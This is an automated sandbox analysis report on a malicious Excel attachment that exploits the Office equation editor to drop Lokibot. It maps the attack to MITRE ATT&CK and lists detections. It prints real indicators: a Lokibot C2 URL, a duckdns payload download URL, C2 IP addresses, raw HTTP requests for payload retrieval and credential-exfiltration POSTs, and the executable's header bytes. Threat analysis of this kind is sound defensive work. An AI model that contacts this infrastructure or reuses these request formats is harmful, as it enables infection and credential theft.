Analysis Report F-A Payment 20-26 force.xlsx

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 216498
Start date: 19.03.2020
Start time: 13:18:03
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 49s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: F-A Payment 20-26 force.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winXLSX@5/8@6/4
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 89% (good quality ratio 85.2%)
  • Quality average: 76.6%
  • Quality standard deviation: 29%
HCA Information: Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active ActiveX Object
  • Active ActiveX Object
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Timeout during Intezer genetic analysis for unpackpe/3.2.vbc.exe.190000.1.unpack

Detection

Strategy  | Score | Range   | Reporting | Whitelisted | Threat  | Detection
Threshold | 100   | 0 - 100 | false     |             | Lokibot | malicious

Confidence

Strategy  | Score | Range | Further Analysis Required? | Confidence
Threshold | 5     | 0 - 5 | false                      |


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial Access: Valid Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link, Spearphishing Attachment, Spearphishing via Service
Execution: Exploitation for Client Execution (13), Graphical User Interface (1), Windows Management Instrumentation, Scheduled Task, Command-Line Interface, Graphical User Interface, Scripting, Third-party Software
Persistence: Winlogon Helper DLL, Port Monitors, Accessibility Features, System Firmware, Shortcut Modification, Modify Existing Service, Path Interception, Logon Scripts
Privilege Escalation: Access Token Manipulation (1), Process Injection (11), Path Interception, DLL Search Order Hijacking, File System Permissions Weakness, New Service, Scheduled Task, Process Injection
Defense Evasion: Masquerading (1), Disabling Security Tools (1), Software Packing (2), Virtualization/Sandbox Evasion (1), Access Token Manipulation (1), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (21)
Credential Access: Credential Dumping (2), Credentials in Registry (2), Input Capture, Credentials in Files, Account Manipulation, Brute Force, Two-Factor Authentication Interception, Bash History
Discovery: Virtualization/Sandbox Evasion (1), Security Software Discovery (12), Remote System Discovery (1), File and Directory Discovery (2), System Information Discovery (23), System Owner/User Discovery, Network Sniffing, Network Service Scanning
Lateral Movement: Remote File Copy (15), Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot, Third-party Software, Pass the Hash, Remote Desktop Protocol
Collection: Email Collection (1), Man in the Browser (1), Data from Local System (2), Input Capture, Data Staged, Screen Capture, Email Collection, Clipboard Data
Exfiltration: Data Encrypted (1), Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over Command and Control Channel, Exfiltration Over Alternative Protocol
Command and Control: Standard Cryptographic Protocol (1), Remote File Copy (15), Standard Non-Application Layer Protocol (4), Standard Application Layer Protocol (124), Standard Cryptographic Protocol, Commonly Used Port, Uncommonly Used Port, Standard Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Premium SMS Toll Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue

Signature Overview


AV Detection:

Found malware configuration
  Source: vbc.exe.2276.3.memstr | Malware Configuration Extractor: Lokibot {"c2:": "http://cpf-th.com/dark/five/fre.php"}
Multi AV Scanner detection for domain / URL
  Source: cpf-th.com | Virustotal: Detection: 8%
  Source: http://cpf-th.com/dark/five/fre.php | Virustotal: Detection: 11%
Multi AV Scanner detection for dropped file
  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exe | Virustotal: Detection: 25%
Multi AV Scanner detection for submitted file
  Source: F-A Payment 20-26 force.xlsx | Virustotal: Detection: 38%
  Source: F-A Payment 20-26 force.xlsx | ReversingLabs: Detection: 24%
Machine Learning detection for dropped file
  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exe | Joe Sandbox ML: detected
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\vbc.exe
Office Equation Editor has been started
  Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Spreading:

Contains functionality to enumerate / list files inside a directory
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
  Source: global traffic | DNS query: name: green9wsdyelectronicsandkitchenappliance.duckdns.org
Potential document exploit detected (performs HTTP gets)
  Source: global traffic | TCP traffic: 192.168.2.2:49158 -> 103.133.106.239:80
Potential document exploit detected (unknown TCP traffic)
  Source: global traffic | TCP traffic: 192.168.2.2:49158 -> 103.133.106.239:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.2:49161 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49161 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49161 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.2:49161 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.2:49162 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49162 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49162 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.2:49162 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49163 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49163 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49163 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49163 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.143.138.47:80 -> 192.168.2.2:49163
  Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49164 -> 185.147.80.213:80
  Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49164 -> 185.147.80.213:80
  Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49164 -> 185.147.80.213:80
  Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49164 -> 185.147.80.213:80
  Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49165 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49165 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49165 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49165 -> 45.143.138.47:80
  Source: Traffic | Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.143.138.47:80 -> 192.168.2.2:49165
Uses dynamic DNS services
  Source: unknown | DNS query: name: green9wsdyelectronicsandkitchenappliance.duckdns.org
Domain name seen in connection with other malware
  Source: Joe Sandbox View | Domain Name: green9wsdyelectronicsandkitchenappliance.duckdns.org green9wsdyelectronicsandkitchenappliance.duckdns.org
Downloads executable code via HTTP
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Mar 2020 12:20:21 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Thu, 19 Mar 2020 10:25:02 GMTETag: "101c00-5a13294f1b971"Accept-Ranges: bytesContent-Length: 1055744Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 aa 09 c0 9e ee 68 ae cd ee 68 ae cd ee 68 ae cd 70 c8 69 cd e9 68 ae cd 1f ae 63 cd db 68 ae cd 1f ae 60 cd 53 68 ae cd 1f ae 61 cd d7 68 ae cd e7 10 2d cd b3 68 ae cd ee 68 af cd fa 69 ae cd 12 1f 17 cd c7 68 ae cd 88 86 7d cd e9 68 ae cd 88 86 67 cd ef 68 ae cd ee 68 39 cd ef 68 ae cd 88 86 62 cd ef 68 ae cd 52 69 63 68 ee 68 ae cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 eb c9 72 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0b 00 00 1e 07 00 00 fa 08 00 00 00 00 00 24 a5 05 00 00 10 00 00 00 30 07 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 10 00 00 04 00 00 38 94 10 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 08 00 a4 01 00 00 00 30 09 00 1c 3b 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 af 08 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 07 00 6c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 db 1c 07 00 00 10 00 00 00 1e 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 
72 64 61 74 61 00 00 d6 a5 01 00 00 30 07 00 00 a6 01 00 00 22 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 41 00 00 00 e0 08 00 00 18 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 1c 3b 07 00 00 30 09 00 00 3c 07 00 00 e0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Internet Provider seen in connection with other malware
  Source: Joe Sandbox View | ASN Name: unknown unknown (3 occurrences)
Uses a known web browser user agent for HTTP communication
  Source: global traffic | HTTP traffic detected:
    GET /office360/regasm.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: green9wsdyelectronicsandkitchenappliance.duckdns.org
    Connection: Keep-Alive
  Source: global traffic | HTTP traffic detected (2 occurrences):
    POST /dark/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: cpf-th.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: B0D737F8
    Content-Length: 174
    Connection: close
  Source: global traffic | HTTP traffic detected (3 occurrences):
    POST /dark/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: cpf-th.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: B0D737F8
    Content-Length: 147
    Connection: close
Contains functionality to download additional files from the internet
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_00404ED4 recv,3_2_00404ED4
Downloads files
  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\99303755.emf
Downloads files from webservers via HTTP
  Source: global traffic | HTTP traffic detected:
    GET /office360/regasm.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: green9wsdyelectronicsandkitchenappliance.duckdns.org
    Connection: Keep-Alive
Performs DNS lookups
  Source: unknown | DNS traffic detected: queries for: green9wsdyelectronicsandkitchenappliance.duckdns.org
Posts data to webserver
  Source: unknown | HTTP traffic detected:
    POST /dark/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: cpf-th.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: B0D737F8
    Content-Length: 174
    Connection: close
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
  Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 19 Mar 2020 12:20:43 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 15
    Connection: close
    X-Powered-By: PHP/7.4.2RC1
    Status: 404 Not Found
    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.
Urls found in memory or binary data
  Source: vbc.exe, 00000003.00000002.1054548644.0049F000.00000004.00020000.sdmp | String found in binary or memory: http://cpf-th.com/dark/five/fre.php
  Source: vbc.exe, vbc.exe, 00000003.00000003.1039184291.02160000.00000004.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
  Source: vbc.exe, 00000003.00000000.974870879.00473000.00000002.00020000.sdmp, regasm[1].exe.1.dr | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html

System Summary:

Malicious sample detected (through community Yara rule)
  Source: 00000003.00000003.1039184291.02160000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
  Source: 3.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
  Source: 3.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
  Source: Screenshot number: 4 | Screenshot OCR: Enable Editing" from 26 protected documents the yellow bar above 27 28 29 30 31 . D 32 33
  Source: Screenshot number: 4 | Screenshot OCR: protected documents the yellow bar above 27 28 29 30 31 . D 32 33 34 35 36 + taj tg %5 x 5
Office equation editor drops PE file
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\vbc.exe
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exe
Detected potential crypto function
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_0040549C 3_2_0040549C
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_004029D4 3_2_004029D4
Document misses a certain OLE stream usually present in this Microsoft Office document type
  Source: F-A Payment 20-26 force.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Dropped file seen in connection with other malware
  Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exe 5C14B0306FF36F187D26A02EE087872C1447E33DCBF424C59F17A2B971D8D9B6
  Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\vbc.exe 5C14B0306FF36F187D26A02EE087872C1447E33DCBF424C59F17A2B971D8D9B6
Found potential string decryption / allocating functions
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: String function: 0041219C appears 45 times
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: String function: 00405B6F appears 42 times
PE file contains strange resources
  Source: regasm[1].exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
  Source: vbc.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Searches the installation path of Mozilla Firefox
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\54.0.1 (x86 en-US)\Main Install Directory
Yara signature match
  Source: 00000003.00000003.1039184291.02160000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
  Source: 3.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
  Source: 3.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Classification label
  Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLSX@5/8@6/4
Contains functionality to adjust token privileges (e.g. debug / backup)
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_0040650A
Contains functionality to instantiate COM classes
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,3_2_0040434D
Creates files inside the user directory
  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$F-A Payment 20-26 force.xlsx
Creates mutexes
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Mutant created: \Sessions\1\BaseNamedObjects\09E3E1D85CB65E97AFA24C0A
Creates temporary files
  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRBE68.tmp
Reads ini files
  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Reads software policies
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
  Source: C:\Users\user\AppData\Roaming\vbc.exe | File read: C:\Windows\System32\drivers\etc\hosts (3 occurrences)
Sample is known by Antivirus
  Source: F-A Payment 20-26 force.xlsx | Virustotal: Detection: 38%
  Source: F-A Payment 20-26 force.xlsx | ReversingLabs: Detection: 24%
Spawns processes
  Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
  Source: unknown | Process created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe'
  Source: unknown | Process created: C:\Windows\System32\mspaint.exe C:\Windows\system32\mspaint.exe -Embedding
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe'
Uses Rich Edit Controls
  Source: C:\Windows\System32\mspaint.exe | File opened: C:\Windows\system32\MSFTEDIT.DLL
Found graphical window changes (likely an installer)
  Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Uses new MSVCR Dlls
  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Document has a 'vbamacros' value indicative of goodware
  Source: F-A Payment 20-26 force.xlsx | Initial sample: OLE indicators vbamacros = False
Document has an 'encrypted' value indicative of goodware
  Source: F-A Payment 20-26 force.xlsx | Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Detected unpacking (changes PE section rights)
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Unpacked PE file: 3.2.vbc.exe.400000.2.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
Detected unpacking (overwrites its own PE header)
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Unpacked PE file: 3.2.vbc.exe.400000.2.unpack
Yara detected aPLib compressed binary
  Source: Yara match | File source: 00000003.00000003.1039184291.02160000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000003.00000002.1054527862.00415000.00000002.00020000.sdmp, type: MEMORY
  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2276, type: MEMORY
  Source: Yara match | File source: 3.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Uses code obfuscation techniques (call, push, ret)
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_00402AC0 push eax; ret 3_2_00402AD4
  Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_00402AC0 push eax; ret 3_2_00402AFC

Persistence and Installation Behavior:

Drops PE files
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\vbc.exe
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exe

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\mspaint.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mspaint.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Document contains OLE streams with high entropy indicating encrypted embedded content
Source: F-A Payment 20-26 force.xlsx | Stream path 'EncryptedPackage' entropy: 7.99946501923 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_0154278E rdtsc 3_2_0154278E
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 2216 | Thread sleep time: -300000s >= -30000s
